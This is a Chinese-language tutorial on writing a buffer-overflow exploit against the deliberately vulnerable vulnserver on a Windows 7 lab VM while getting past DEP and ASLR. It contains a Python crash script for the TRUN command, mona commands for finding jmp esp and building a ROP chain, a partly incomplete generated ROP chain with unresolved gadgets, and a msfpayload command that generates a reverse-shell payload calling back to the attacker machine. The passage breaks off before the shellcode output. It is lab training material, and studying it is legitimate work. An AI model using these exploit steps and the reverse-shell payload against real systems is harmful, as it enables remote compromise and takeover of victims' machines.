本文主要介绍带DEP防护和ASLR功能的操作系统或软件如何被绕过,从而执行漏洞利用和攻击,其它相关知识领域请自行上网搜索。
1、工具软件
ImmunityDebugger1.85
mona 插件
python 2.7.1
vulnserver
win7虚拟机开启所有程序的DEP防护并运行vulnserver,ip 192.168.254.154
kali1.0虚拟机执行攻击脚本,ip 192.168.254.155
打包下载地址:http://download.csdn.net/detail/jiayanhui2877/9111687
查看是否开启了全防护wmic OS Get DataExecutionPrevention_SupportPolicy
如果返回值不是3请自行设置DEP全防护
2、流程方法
使用如下脚本测试vulnserver在接收多少数据后崩溃,通过测试发现在2006字节后崩溃,说明函数ret时,eip执行到此地址处为非法地址程序崩溃,所以制作exploit时,在2006字节后应该为rop_chains,之后为shellcode.
#!/usr/bin/python
import socket
server = '192.168.254.154'
sport = 9999
#length = int(raw_input('length of attack: '))
prefix = 'A' * 1000
chars = ''
for i in range(0x30,0x35):
for j in range(0x30,0x3A):
for k in range(0x30,0x3A):
chars += chr(i) + chr(j) + chr(k) + 'A'
print chars,"\r\n"
attack = prefix + chars
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect = s.connect((server,sport))
print s.recv(1024)
print "Sending attack to trun . with lenght ", len(attack)
s.send(('TRUN .'+ attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
s.close()
3、生成rop链
详细命令如下:
!mona -h //查看帮助
!mona modules //查看模块信息包括哪些模块使用了ASLR
!mona jmp -r esp -m essfunc.dll //查找jmp esp
//jmp esp \xFF\xE4
!mona asm -s jmp esp //将jmp esp转为汇编码
!mona find -s "\xFF\xE4" -m essfunc.dll //搜索汇编码
!mona rop -m *.dll -cp nonull //生成rop链
*** [ Python ] ***
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = ""
rop_gadgets += struct.pack('<L',0x00000000) # [-] Unable to find gadgets to pickup the desired API pointer into esi
rop_gadgets += struct.pack('<L',0x00000000) # [-] Unable to find ptr to &VirtualAlloc()
rop_gadgets += struct.pack('<L',0x00402a25) # POP EBP # RETN [vulnserver.exe]
rop_gadgets += struct.pack('<L',0x625011af) # & jmp esp [essfunc.dll]
rop_gadgets += struct.pack('<L',0x625011d8) # POP EBX # RETN [essfunc.dll]
rop_gadgets += struct.pack('<L',0x00000001) # 0x00000001-> ebx
rop_gadgets += struct.pack('<L',0x625011fc) # POP EDX # RETN [essfunc.dll]
rop_gadgets += struct.pack('<L',0x00001000) # 0x00001000-> edx
rop_gadgets += struct.pack('<L',0x6250120c) # POP ECX # RETN [essfunc.dll]
rop_gadgets += struct.pack('<L',0x00000040) # 0x00000040-> ecx
rop_gadgets += struct.pack('<L',0x6250195e) # POP EDI # POP EBP # RETN [essfunc.dll]
rop_gadgets += struct.pack('<L',0x6250172c) # RETN (ROP NOP) [essfunc.dll]
rop_gadgets += struct.pack('<L',0x41414141) # Filler (compensate)
rop_gadgets += struct.pack('<L',0x625011b4) # POP EAX # RETN [essfunc.dll]
rop_gadgets += struct.pack('<L',0x90909090) # nop
rop_gadgets += struct.pack('<L',0x00000000) # [-] Unable to find pushad gadget
return rop_gadgets
rop_chain = create_rop_chain()
4、生成shellcode
msfpayload windows/shell_reverse_tcp LHOST="192.168.254.155" LPORT=443 EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -b '\x00'
输出: